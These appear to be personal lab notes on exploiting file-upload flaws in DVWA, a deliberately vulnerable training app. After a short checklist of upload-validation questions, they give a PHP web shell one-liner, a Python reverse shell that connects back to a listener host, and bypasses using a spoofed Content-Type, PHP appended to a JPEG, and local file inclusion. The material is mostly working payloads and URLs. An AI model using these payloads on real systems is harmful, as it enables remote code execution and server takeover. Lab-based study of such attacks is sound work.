Step 1 — Understand Upload Surface

When you see upload functionality, ask:
What file types are allowed?
Is extension validated?
Is MIME(Multipurpose Internet Mail Extensions) type validated?
Is file content inspected?
Where is file stored?
Is it publicly accessible?
Is it processed later?
Is it renamed?


step 1: create shell 
<?php system($_GET['cmd']); ?> >> shell.php

step 2 : upload it 
step 3 : access it using url http://10.0.2.5/dvwa/hackable/uploads/shell.php?cmd=id

next for rce : 

step 1  : start nc listner
step 2  access browser url of file tp triggger it :

http://10.0.2.4/dvwa/hackable/uploads/shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.0.2.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash"])'  

(or)


 http://10.0.2.4/dvwa/hackable/uploads/shell.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket();s.connect((%2210.0.2.5%22,4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([%22/bin/bash%22])%27




medium
------
if server checks the file content-type then change it to Content-Type : image/jpeg using burp
(or)
download a image images.jpeg and echo '<?php system($_GET["cmd"]); ?>' >> images.jpg
 
 
 next upload the image and access it using lfi and pass command > http://10.0.2.4/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/images.jpg&cmd=id
 
 
 
 
 
 
 
